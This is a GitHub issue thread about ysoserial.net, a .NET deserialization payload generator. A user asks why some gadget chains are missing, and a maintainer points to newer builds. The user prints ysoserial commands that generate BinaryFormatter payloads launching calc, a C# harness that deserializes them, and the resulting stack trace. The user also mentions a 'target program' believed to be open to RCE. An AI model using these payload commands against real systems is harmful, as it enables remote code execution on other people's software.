Gadget not supported

Question

Gadget not supported

djerryz opened this issue 4 years ago · comments

Djerryz commented 4 years ago

I see README.md apply:
RolePrincipal
DataSet
ClaimsIdentity

but i run "ysoserial.exe -h", did not show above gaget, so i need some help. thank you.

Djerryz · Answer 1 · Thu Apr 23 2020 18:19:00 GMT+0800 (China Standard Time)

Djerryz commented 4 years ago

Djerryz · Answer 2 · Thu Apr 23 2020 18:21:17 GMT+0800 (China Standard Time)

And My target program look like .net 2, it use "binaryFormatter.Deserialize(memoryStream);" , i can control memoryStream , so i think it have RCE vulnerbility

Soroush Dalili · Answer 3 · Thu Apr 23 2020 19:37:11 GMT+0800 (China Standard Time)

I think you are using the old version. You can get the latest version from https://github.com/pwntester/ysoserial.net/actions

That said, if your target uses .NET v2.0, we currently have an old branch for it which still requires .NET 3.5 to be available on the box: https://github.com/pwntester/ysoserial.net/tree/v2

Soroush Dalili · Answer 4 · Thu Apr 23 2020 19:37:47 GMT+0800 (China Standard Time)

We are in the process of updating the release section so that will soon be available too to reduce the confusion :)

Djerryz · Answer 5 · Fri Apr 24 2020 00:46:25 GMT+0800 (China Standard Time)

I think you are using the old version. You can get the latest version from https://github.com/pwntester/ysoserial.net/actions

That said, if your target uses .NET v2.0, we currently have an old branch for it which still requires .NET 3.5 to be available on the box: https://github.com/pwntester/ysoserial.net/tree/v2

I down "Release 1.32" from the release page , because i do not have install visual studio tool or library, build the project maybe difficulty to me. But thanks to your answer, i will download the zip and try to build it , if success i wll close this issues.

Djerryz · Answer 6 · Fri Apr 24 2020 01:07:12 GMT+0800 (China Standard Time)

"https://github.com/pwntester/ysoserial.net/suites/621551954/artifacts/4910623" is awesome.
try "ysoserial.exe -f BinaryFormatter -g RolePrincipal -c "cacl" -t -o base64" general payload seem not effect to target program.
"https://github.com/pwntester/ysoserial.net/tree/v2" build failed, seem i lose " .NETFramework,Version=v2.0 ", can u build it for me: )

Djerryz · Answer 7 · Fri May 22 2020 23:43:52 GMT+0800 (China Standard Time)

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o base64 -t

string abc = "base64 string create by ysoserial";
MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(abc));
Console.WriteLine(Encoding.UTF8.GetString(memoryStream.ToArray()));
BinaryFormatter binaryFormatter = new BinaryFormatter();
object obj = binaryFormatter.Deserialize(memoryStream);

(netcoreapp3.1) dotnet run , Error Log:

Unhandled exception. System.InvalidCastException: Object must implement IConvertible.
   at System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider)
   at System.Runtime.Serialization.FormatterConverter.Convert(Object value, Type type)
   at System.Runtime.Serialization.SerializationInfo.GetValue(String name, Type type)
   at System.Collections.Generic.SortedSet`1.OnDeserialization(Object sender)
   at System.Collections.Generic.SortedSet`1.System.Runtime.Serialization.IDeserializationCallback.OnDeserialization(Object sender)
   at System.Runtime.Serialization.ObjectManager.RaiseDeserializationEvent()
   at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(BinaryParser serParser, Boolean fCheck)
   at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, Boolean check)
   at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream)

Referer: https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7

The same Error in ysoserial.exe version Release-17 and Release 1.33